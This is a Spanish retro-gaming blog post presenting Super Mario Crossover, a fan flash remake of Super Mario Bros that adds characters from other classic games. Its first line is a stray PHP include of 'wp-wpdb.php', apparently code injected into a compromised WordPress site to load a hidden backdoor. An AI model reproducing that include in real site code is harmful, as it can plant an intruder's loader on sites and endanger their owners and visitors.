if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Super Mario Crossover, un Super Mario Bros con personajes de otros juegos – La Fortaleza de LeChuck

Super Mario Crossover, un Super Mario Bros con personajes de otros juegos

Imaginaos que cogemos clásico Super Mario Bros y añadimos los míticos personajes de Nintendo y otras compañías de la era 8 y 16 bits. ¿Os imagináis cómo sería jugar con Mario, Link, Samus u otros personajes saltando y corriendo por los diferentes niveles? y además, poder jugar cómodamente desde vuestro navegador! Pues unos fans hace unos años hicieron este sueño realidad con Super Mario Crossover, y hace unos días presentaron el trailer de la versión 3.0.

Como ellos expresan en su web, Super Mario Bros Crossover es un juego flash creado por Jay Pavlina y Zach Robinson (Ryuza) de Exploding Rabbit. Se trata de un remake de Super Mario Bros en la NES, pero da a los jugadores la opción de jugar con personajes de otros juegos, además de Mario, y viene con más funciones, tales como trampas, niveles de dificultad, nuevos modos de juego, etc. Desde entonces se han lanzado varias actualizaciones, añadiendo personajes y modos de juego. Para junio está previsto Super Mario Crossover 3.0, incluyendo escenario de Super Mario  Special y nuevos personajes. Aquí podéis ver el trailer.

Pero vamos a lo importante, ¿no estáis deseando probarlo? Pues mientras sale la última actualización, podéis jugar a la anterior aquí.

Publicada el
Categorizado como Retro

Por Arashi

Aparte de patear traseros de piratas como gobernadora en Mêlée, soy una fanática de los videojuegos desde que de pequeña me regalaron la Atari 2600. Adoro las aventuras gráficas y los RPG, pero no le hago ascos al resto. Otra de mis pasiones es todo lo relacionado con Japón.

Dejar un comentario